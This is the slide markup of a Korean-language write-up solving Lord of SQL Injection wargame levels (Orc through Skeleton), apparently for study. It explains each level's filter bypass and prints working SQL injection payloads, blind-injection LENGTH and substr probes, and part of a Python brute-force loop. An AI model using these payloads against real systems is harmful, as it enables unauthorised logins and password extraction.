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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="327" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="257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4" r:id="rId36"/>
    <p:sldId id="291" r:id="rId37"/>
    <p:sldId id="292" r:id="rId38"/>
    <p:sldId id="305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3" r:id="rId49"/>
    <p:sldId id="313" r:id="rId50"/>
    <p:sldId id="306" r:id="rId51"/>
    <p:sldId id="307" r:id="rId52"/>
    <p:sldId id="308" r:id="rId53"/>
    <p:sldId id="309" r:id="rId54"/>
    <p:sldId id="310" r:id="rId55"/>
    <p:sldId id="314" r:id="rId56"/>
    <p:sldId id="311" r:id="rId57"/>
    <p:sldId id="312" r:id="rId58"/>
    <p:sldId id="315" r:id="rId59"/>
    <p:sldId id="316" r:id="rId60"/>
    <p:sldId id="317" r:id="rId61"/>
    <p:sldId id="321" r:id="rId62"/>
    <p:sldId id="318" r:id="rId63"/>
    <p:sldId id="319" r:id="rId64"/>
    <p:sldId id="322" r:id="rId65"/>
    <p:sldId id="320" r:id="rId66"/>
    <p:sldId id="324" r:id="rId67"/>
    <p:sldId id="32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enkLILBYgfRkSiIis9ysw==" hashData="LQvEH0nV0ERc6ilkFVLYLg1qqn75mQmXLKEWqZuHCVgBb/yCYsJQ2Z8Njc6DUAW0kYzFPvpxvHBjBPWc8aoz9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2264-2B13-479F-97F5-185AF153827A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4582B-88E8-42A3-B828-53AA9460A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2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9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0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0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9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D8DB-040C-4E98-BE34-B08EE8BA2EC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E5F4-92F9-4C4F-B910-F5324C0E1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los.eagle-jump.org/orc_4~a.php?pw=12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os.eagle-jump.org/wolfman_f~7.php?pw='or'a'='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os.eagle-jump.org/troll_6~8.php?id=aDMIn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vertstring.com/EncodeDecode/HexEn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98B01-552A-420C-8A46-537BB1E52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모두의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E9B64-E327-4993-9BF9-DBBE36A7A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홍승현</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34530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2DD1E-10FD-4F8E-9809-DAAC605A8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Orc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ABAE5-E00D-4595-8214-6510395F0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7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3C1608-6BA2-45B8-8885-AD18C0B18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prob_orc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A59E3-F655-4266-90C2-F6922971A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" y="126402"/>
            <a:ext cx="11913326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prob_orc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prob_orc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orc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lang="en-US" altLang="ko-KR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고정이고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찾거나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sql injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>으로 참값을 반환받아야 할 것 같다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실제로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부분에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘or’a’=‘a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 넣으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hello admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 나오지만 밑에서 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addslashes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(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pw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]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>를 하고나서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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그 결과로 질의를 또 한 번 전송하고 이 응답의 결과와 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'pw'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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>를 비교해서 같아야 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>solve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>가 된다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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>함수는 쿼터나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>(‘,”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> 백슬래쉬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>(\)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>가 있는 인자값을 문자열처리하기 위해서 쓰는 함수인데</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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그 방법으로는 인자값의 앞에 특수문자효과를 무시하는 백슬래쉬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>(\)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>를 넣어준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS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그럼 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pw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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>의 값은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> \‘or\’a\’=\‘a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>으로 바뀐다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>이렇게 쿼리로 전송하면 당연히 참값을 반환받지 못 할 것이고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>를 우회한다고 해도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pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>칼럼에 있는 정확한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pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>의 값과 같을리 없다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그래서 이 문제는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blind sql injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 통해 정확한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찾아내야 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5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96A6D-F011-461A-8283-87553BA7A1E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161108" y="240268"/>
            <a:ext cx="118697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가장 먼저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>LENGTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 통해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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인 유저의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 몇 자리인지 알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https://los.eagle-jump.org/orc_4~a.php?pw=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ or id=‘admin’ and LENGTH(pw)&lt;10--%20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>앞에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id=‘admin’ and pw= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>부분이 고정이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>값에 아무값도 넣지 않고 첫번째 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>조건은 거짓을 만들고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>조건으로 조건을 새로 하나 만든다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그 조건은 </a:t>
            </a:r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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 길이가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>자리 이하냐는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>조건이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이런식으로 유추를 해나가면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>자리라는것을 알 수 있고 이제는 자동화 프로그램으로 찾아야한다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242FE4-C401-4D66-9568-0C6F7AF222F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161108" y="1071265"/>
            <a:ext cx="11760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query : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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select id from prob_orc where id='admin' and pw=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b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'123' or id='admin' and LENGTH(pw)&lt;10-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ADB6FA-395A-4FAC-A957-567BECA7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7" y="2278084"/>
            <a:ext cx="849463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//url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읽어줄 수 있는 헤더선언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~!@#$%^&amp;*()+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” //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대입해볼 문자열 리스트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//i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까지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//j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길이만큼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"https://los.eagle-jump.org/orc_4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a.php?pw=' or id='admin' and (substr(`pw`,"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 = '"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en-US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//url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읽었을 때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Hello admin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문자열이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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발견되었다면 그 때의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US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번째 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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출력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FD7138-26CD-4F55-ACD8-39374A9EF3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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261257" y="4032410"/>
            <a:ext cx="12192000" cy="19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B15CB-C1D7-4A7C-B753-287216BB6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Wolfman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A1C8A-613F-4B44-81B9-3A479937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8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C98A17-224E-4F1D-A3AE-952D8B1E5257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113212" y="1187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query : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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select id from prob_wolfman where id='guest' and pw=''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17F8CD-E5C0-477F-BF76-3BAD92484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118795"/>
            <a:ext cx="85170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 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whitespace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prob_wolfman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"wolfman"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D82D4-FCE6-4B5B-AB0E-2571C277A72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113212" y="4171407"/>
            <a:ext cx="1159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스페이스바를 우회하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id=‘guest’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인 조건을 거짓으로 만든 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인 조건을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>연산자로 넣어주었다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https://los.eagle-jump.org/wolfman_f~7.php?pw='or'a'='b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>' or id='admin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5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61E1-8515-4A2A-B116-E2705DFA2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Darkelf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FFBC7-41C3-4ADE-9E0D-9CC3CAB94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08D6904-CC8D-4E42-978A-62E3FF0C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3918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prob_darkelf where id='guest'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C77AC0-EEE6-4F1B-AEC6-17B84282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251402"/>
            <a:ext cx="835036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'/or|and/i'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prob_darkelf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"darkelf"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75BA-E8C1-4229-A662-B7F7975DD746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130628" y="4272581"/>
            <a:ext cx="1196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이번에도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id=guset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>조건을 거짓으로 만들고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id=‘admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인 조건을 만든 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>연산자만 우회해주면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https://los.eagle-jump.org/darkelf_6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>5.php?pw=' || 'a'='b' || id='admin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0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D3F4D-69C1-4765-8B42-8DDB52F35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Orge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A1672-9880-4406-BD45-724BE119C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6CF3E2-9F61-4648-A631-1C9250BD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2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prob_orge where id='guest'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CB0E79-E1B4-4D27-B746-6E43311B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873"/>
            <a:ext cx="1219200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'/or|and/i'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prob_orge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prob_orge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"orge"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이번에도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admin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의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pw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를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blind sql injection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을 통해 찾아야 할 것 같다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and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연산자는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&amp;&amp;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로 우회할 수 있는데 필터링이 되어있는지 작동을 안 하니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%26%26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으로 대체하였다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guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>조건을 거짓으로 만들고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id=‘admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>일때 그 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>blind injection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https://los.eagle-jump.org/orge_4~0.php?pw=' || id='admin' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%26%26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>LENGTH(pw)=8--%20 &gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참값이 나옴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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이번에도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>글자다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파이썬으로 찾아준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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4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37170-6E72-45E0-81E5-D2DF882A5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Troll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A5115-75C6-4295-84B3-66389AA6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5DA45-D256-4A6A-AF6E-52145A4DA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Gremlin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6BAE6-1823-41BF-9FC0-7B7691841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39C40-EA7C-4210-8EB7-92CCD788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302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prob_troll where id=''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16854-45CD-47BC-9D81-81926B3D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3" y="236887"/>
            <a:ext cx="1198299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ereg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prob_troll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"troll"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함수로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>입력받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>파라미터에서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을 찾으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HeHe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 출력하는데 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ereg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>는 대소문자를 구별하기 때문에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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://los.eagle-jump.org/troll_6~8.php?id=aDMIn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으로 우회하면 쉽게 풀린다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eregi()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대소문자를 구별하지 않는다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eregi()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 때는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뜻하는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en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 문자열 앞에 넣어주면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>는 문자열이 끝났다고 생각해서 그 뒤는 검사하지 않는다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왜냐하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ereg(), eregi()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>언어를 기반으로 한 함수인데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언어에서는 문자열끝에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문자가 들어가기 때문이다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최근 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>버전에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ereg()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eregi()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 취약해 이를 대신해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>함수를 사용한다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3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46C6B-D68D-4E16-A9F6-F3CD9121E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Vampire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006C4C-9911-4EA2-B85B-5DB3911A4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6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0038FC-F57E-48F5-9C99-862483E2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prob_vampire where id=''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D271F-64AB-4E03-95AC-F74B6163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26"/>
            <a:ext cx="1193074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str_replace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prob_vampire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"vampire"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str_replace()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>함수는 인자값의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값이 있다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 치환하는데 검사를 한 번만 한다는 점을 이용하여 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https://los.eagle-jump.org/vampire_0~4.php?id=?ad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en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>min </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>으로 풀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preg_replace()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함수는 정규식을 이용하는 치환함수라는점에서 차이가 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0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C9148-BEC7-46B0-866E-6177B5C0A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Skeleton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FF71B1-C460-4B23-8661-8379648AF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076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DC0130E-EE0E-494C-A4DE-D18A2E45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3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prob_skeleton where id='guest' and pw='' and 1=0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A11EB6-3CFC-435B-A9DA-A1073F76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436"/>
            <a:ext cx="121920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prob_skeleton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1=0"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"skeleton"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https://los.eagle-jump.org/skeleton_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>b.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pw=' or id='admin' and pw='a'='a' or 'a'='a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:srgbClr val="FF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select id from prob_skeleton where id='guest' and pw</a:t>
